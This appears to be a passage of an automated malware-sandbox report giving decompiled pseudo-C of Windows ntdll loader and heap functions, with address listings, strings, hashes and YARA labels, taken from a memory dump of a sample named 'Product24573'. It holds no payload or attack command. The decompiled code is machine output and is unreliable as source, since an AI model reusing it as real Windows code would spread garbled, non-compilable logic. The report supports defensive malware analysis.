                                          • Opcode ID: b754e272dcd528f3151e9fbc0f6bfa29510c665d18822275e6a1efeb653bb75d
                                          • Instruction ID: 84fedfa5034a9fa24e9c78cfab5144955f0f986aef2c2f57aecaeea1ec049f0a
                                          • Opcode Fuzzy Hash: b754e272dcd528f3151e9fbc0f6bfa29510c665d18822275e6a1efeb653bb75d
                                          • Instruction Fuzzy Hash: 8B61DE306046019FDB2DCF28C484BAAFBF5FF44704F19856EE8498B299D731E891CB96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01107E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E01107E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0110CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E010FC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x11e5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01175510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x11e5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01117D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01117D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01177016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01117D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01117D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01177016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0112A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E010FB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                          0x01107e4c
                                          0x01107e50
                                          0x01107e55
                                          0x01107e58
                                          0x01107e5d
                                          0x01107e71
                                          0x01107f33
                                          0x01107e77
                                          0x01107e77
                                          0x01107e79
                                          0x01107e79
                                          0x01107e7e
                                          0x01107f45
                                          0x01159848
                                          0x00000000
                                          0x01159848
                                          0x01107f4e
                                          0x01107f53
                                          0x01107f5a
                                          0x00000000
                                          0x00000000
                                          0x0115985a
                                          0x01159862
                                          0x01159866
                                          0x00000000
                                          0x0115986c
                                          0x00000000
                                          0x0115986c
                                          0x01107e84
                                          0x01107e84
                                          0x01107e8d
                                          0x01159871
                                          0x01107eb8
                                          0x01107ec0
                                          0x01107ec0
                                          0x01107e9a
                                          0x0115987e
                                          0x00000000
                                          0x00000000
                                          0x01159884
                                          0x0115988b
                                          0x011598a7
                                          0x011598ac
                                          0x011598b1
                                          0x011598b6
                                          0x011598b8
                                          0x011598b8
                                          0x011598b9
                                          0x00000000
                                          0x011598b9
                                          0x01107ea0
                                          0x01107ea7
                                          0x00000000
                                          0x00000000
                                          0x01107eac
                                          0x01107eb1
                                          0x01107ec6
                                          0x01107ed0
                                          0x011598cc
                                          0x01107ed6
                                          0x01107ed6
                                          0x01107ed6
                                          0x01107ede
                                          0x01107ee3
                                          0x011598e3
                                          0x011598f0
                                          0x01159902
                                          0x011598f2
                                          0x011598fb
                                          0x011598fb
                                          0x01159907
                                          0x0115991d
                                          0x0115991d
                                          0x01159907
                                          0x011598e3
                                          0x01107ef0
                                          0x01107f14
                                          0x01107f14
                                          0x01107f1e
                                          0x01159946
                                          0x01107f24
                                          0x01107f24
                                          0x01107f24
                                          0x01107f2c
                                          0x0115996a
                                          0x01159975
                                          0x01159975
                                          0x0115997e
                                          0x01159993
                                          0x01159993
                                          0x0115997e
                                          0x00000000
                                          0x01107ef2
                                          0x01107efc
                                          0x01107f0a
                                          0x01107f0e
                                          0x01159933
                                          0x00000000
                                          0x01159933
                                          0x00000000
                                          0x01107f0e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01107eb1

                                          Strings
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01159891
                                          • minkernel\ntdll\ldrmap.c, xrefs: 011598A2
                                          • LdrpCompleteMapModule, xrefs: 01159898
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 49cfecc86bd9738cc0dc9dcd437b6c01233ee3c7fe75881d0cb1ec193429dce5
                                          • Instruction ID: 77a9d00978c2c6072bb62875f9e8f333ea6379657ef836c58e0b263dd6bf954d
                                          • Opcode Fuzzy Hash: 49cfecc86bd9738cc0dc9dcd437b6c01233ee3c7fe75881d0cb1ec193429dce5
                                          • Instruction Fuzzy Hash: 3551F431A01749DBEB2ECB5CC944B6ABBE4AF01318F1405A9E9A19B7D1D7B4FD00C752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011A23E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E011A23E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x11e874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x11e874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E0114D4F0(_t83, 0x10d6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E010FB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x11e6378 = 1;
						asm("int3");
						 *0x11e6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                          0x011a23e3
                                          0x011a23e8
                                          0x011a23eb
                                          0x011a23ee
                                          0x011a23f3
                                          0x011a259b
                                          0x011a259b
                                          0x011a259d
                                          0x011a25a3
                                          0x011a25a3
                                          0x011a23fb
                                          0x011a2424
                                          0x011a244f
                                          0x011a2460
                                          0x011a2451
                                          0x011a2451
                                          0x011a2456
                                          0x011a2458
                                          0x011a2458
                                          0x011a245b
                                          0x011a245b
                                          0x011a2426
                                          0x011a2431
                                          0x011a2436
                                          0x011a2443
                                          0x011a2438
                                          0x011a2438
                                          0x011a2438
                                          0x011a2445
                                          0x011a2445
                                          0x011a2463
                                          0x011a2469
                                          0x011a246f
                                          0x011a2480
                                          0x011a2495
                                          0x011a24a1
                                          0x011a24ce
                                          0x011a24df
                                          0x011a24d0
                                          0x011a24d0
                                          0x011a24d5
                                          0x011a24d7
                                          0x011a24d7
                                          0x011a24da
                                          0x011a24da
                                          0x011a24a3
                                          0x011a24b0
                                          0x011a24b5
                                          0x011a24c2
                                          0x011a24b7
                                          0x011a24b7
                                          0x011a24b7
                                          0x011a24c4
                                          0x011a24c4
                                          0x011a24e8
                                          0x011a2497
                                          0x011a249a
                                          0x011a249a
                                          0x011a2482
                                          0x011a2488
                                          0x011a2488
                                          0x011a2471
                                          0x011a2479
                                          0x011a2479
                                          0x011a24ef
                                          0x011a23fd
                                          0x011a2401
                                          0x011a2412
                                          0x011a2403
                                          0x011a2403
                                          0x011a2408
                                          0x011a240a
                                          0x011a240a
                                          0x011a240d
                                          0x011a240d
                                          0x011a241b
                                          0x011a241b
                                          0x011a24f1
                                          0x011a24f6
                                          0x011a2507
                                          0x011a2510
                                          0x00000000
                                          0x011a2510
                                          0x011a250b
                                          0x00000000
                                          0x011a24f8
                                          0x011a24f8
                                          0x011a24fc
                                          0x011a2500
                                          0x011a2512
                                          0x011a2515
                                          0x011a251a
                                          0x011a2521
                                          0x011a2524
                                          0x011a2529
                                          0x011a252f
                                          0x00000000
                                          0x00000000
                                          0x011a253c
                                          0x011a255c
                                          0x011a2561
                                          0x011a253e
                                          0x011a2554
                                          0x011a2559
                                          0x011a256a
                                          0x011a256d
                                          0x011a2574
                                          0x011a2586
                                          0x011a2588
                                          0x011a258f
                                          0x011a2590
                                          0x011a2590
                                          0x011a2597
                                          0x00000000
                                          0x011a2597

                                          Strings
                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 011A256F
                                          • HEAP: , xrefs: 011A255C
                                          • HEAP[%wZ]: , xrefs: 011A254F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                          • API String ID: 0-3815128232
                                          • Opcode ID: 242c55bc8647326e4d7ab7964dbbf8f762fe1e00f7443bea31061b56e889e330
                                          • Instruction ID: dbc0c92e3bc6473a951c89d59415bb93c071ec98ab9751e7512476b4d124d37a
                                          • Opcode Fuzzy Hash: 242c55bc8647326e4d7ab7964dbbf8f762fe1e00f7443bea31061b56e889e330
                                          • Instruction Fuzzy Hash: 035115382042508AE37CCE2EC8447B27FF1EB48644FD5485DE9D6CB685D33AD846DB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010FE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E010FE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E010FF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E011395D0();
						}
						if(_t78 != 0) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0113FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0113BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01139600();
					if(_t97 < 0) {
						goto L6;
					}
					E0113BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L010FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0113BB40(_t83, _t102 + 0x24, _t78);
								if(L011043C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0113BB40(_t84, _t102 + 0x24, _t94);
									if(L011043C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                          0x010fe620
                                          0x010fe628
                                          0x010fe62f
                                          0x010fe631
                                          0x010fe635
                                          0x010fe637
                                          0x010fe63e
                                          0x01155503
                                          0x01155503
                                          0x010fe64c
                                          0x010fe64c
                                          0x010fe651
                                          0x00000000
                                          0x00000000
                                          0x010fe661
                                          0x010fe665
                                          0x0115542a
                                          0x010fe715
                                          0x010fe71a
                                          0x010fe71c
                                          0x010fe720
                                          0x010fe720
                                          0x010fe727
                                          0x010fe736
                                          0x010fe736
                                          0x010fe743
                                          0x010fe743
                                          0x010fe673
                                          0x010fe678
                                          0x010fe67d
                                          0x010fe682
                                          0x010fe685
                                          0x010fe692
                                          0x010fe69b
                                          0x010fe6a3
                                          0x010fe6ad
                                          0x010fe6b1
                                          0x010fe6b2
                                          0x010fe6bb
                                          0x010fe6bf
                                          0x010fe6c0
                                          0x010fe6c8
                                          0x010fe6cc
                                          0x010fe6d5
                                          0x010fe6d9
                                          0x00000000
                                          0x00000000
                                          0x010fe6e5
                                          0x010fe6ea
                                          0x010fe6f9
                                          0x010fe70b
                                          0x010fe70f
                                          0x01155439
                                          0x0115545e
                                          0x0115545e
                                          0x00000000
                                          0x0115545e
                                          0x0115543b
                                          0x0115543e
                                          0x01155440
                                          0x01155445
                                          0x01155472
                                          0x01155475
                                          0x0115548d
                                          0x01155493
                                          0x011554a9
                                          0x00000000
                                          0x00000000
                                          0x011554ab
                                          0x011554b4
                                          0x011554bc
                                          0x011554c8
                                          0x011554de
                                          0x011554fb
                                          0x011554e0
                                          0x011554e6
                                          0x011554eb
                                          0x011554eb
                                          0x011554de
                                          0x00000000
                                          0x011554bc
                                          0x01155477
                                          0x0115547a
                                          0x01155480
                                          0x01155483
                                          0x01155486
                                          0x0115548b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0115548b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01155447
                                          0x01155447
                                          0x01155447
                                          0x01155447
                                          0x0115544e
                                          0x00000000
                                          0x00000000
                                          0x01155450
                                          0x01155452
                                          0x01155455
                                          0x0115545a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0115545c
                                          0x0115546a
                                          0x0115546d
                                          0x0115546f
                                          0x00000000
                                          0x0115546f
                                          0x010fe70f

                                          Strings
                                          • InstallLanguageFallback, xrefs: 010FE6DB
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 010FE68C
                                          • @, xrefs: 010FE6C0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: 0ccd458ce6d97943bcb57f7df6620105bf5c0a4546eb140d5ce2b68207d275a6
                                          • Instruction ID: 75600b21769e481c69d9ba9350ccce22dd32b86b6ee86ed1f048179b50483adf
                                          • Opcode Fuzzy Hash: 0ccd458ce6d97943bcb57f7df6620105bf5c0a4546eb140d5ce2b68207d275a6
                                          • Instruction Fuzzy Hash: 1E51E572508306DBD758DF68C440A6BB7E9BF88718F05092EFA95D7650FB34D904C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111B8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E0111B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x11e8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E010FB150();
						} else {
							E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E010FB150();
						__eflags =  *0x11e7bc8;
						if(__eflags == 0) {
							E011B2073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E0111AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                          0x0111b8f0
                                          0x0111b8f2
                                          0x0111b8f4
                                          0x01162c4e
                                          0x01162c50
                                          0x01162c56
                                          0x01162c5c
                                          0x01162c60
                                          0x01162c7f
                                          0x01162c84
                                          0x01162c62
                                          0x01162c77
                                          0x01162c7c
                                          0x01162c8a
                                          0x01162c8f
                                          0x01162c94
                                          0x01162c9c
                                          0x01162ca5
                                          0x01162ca5
                                          0x01162c9c
                                          0x01162c50
                                          0x0111b8fa
                                          0x0111b902
                                          0x0111b921
                                          0x0111b921
                                          0x0111b924
                                          0x0111b924
                                          0x0111b927
                                          0x00000000
                                          0x00000000
                                          0x0111b929
                                          0x0111b92b
                                          0x0111b92d
                                          0x0111b940
                                          0x00000000
                                          0x0111b940
                                          0x0111b932
                                          0x0111b932
                                          0x00000000
                                          0x0111b932
                                          0x00000000
                                          0x0111b904
                                          0x0111b904
                                          0x0111b90a
                                          0x0111b90c
                                          0x0111b916
                                          0x0111b919
                                          0x0111b915
                                          0x0111b915
                                          0x0111b91b
                                          0x0111b91b
                                          0x00000000
                                          0x0111b910

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          • Opcode ID: 8ea79d7acd7ac91b315950c99eeb9fb44aa590a57eaabcbdb1b80fa4ea25c057
                                          • Instruction ID: f5d69c84b1dd7c4f648a18a96f3fb04740bb357ba3b30ca99b4bf79541d84233
                                          • Opcode Fuzzy Hash: 8ea79d7acd7ac91b315950c99eeb9fb44aa590a57eaabcbdb1b80fa4ea25c057
                                          • Instruction Fuzzy Hash: 4611BE713092069FD72D9A19C495B76F7B6EF80A20F19807DE58ACB259E730D881CB4A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011BE539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E011BE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E011BBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E011BBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E011BAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01139730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E011BA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E011BA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01139730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E011BA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E011BA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
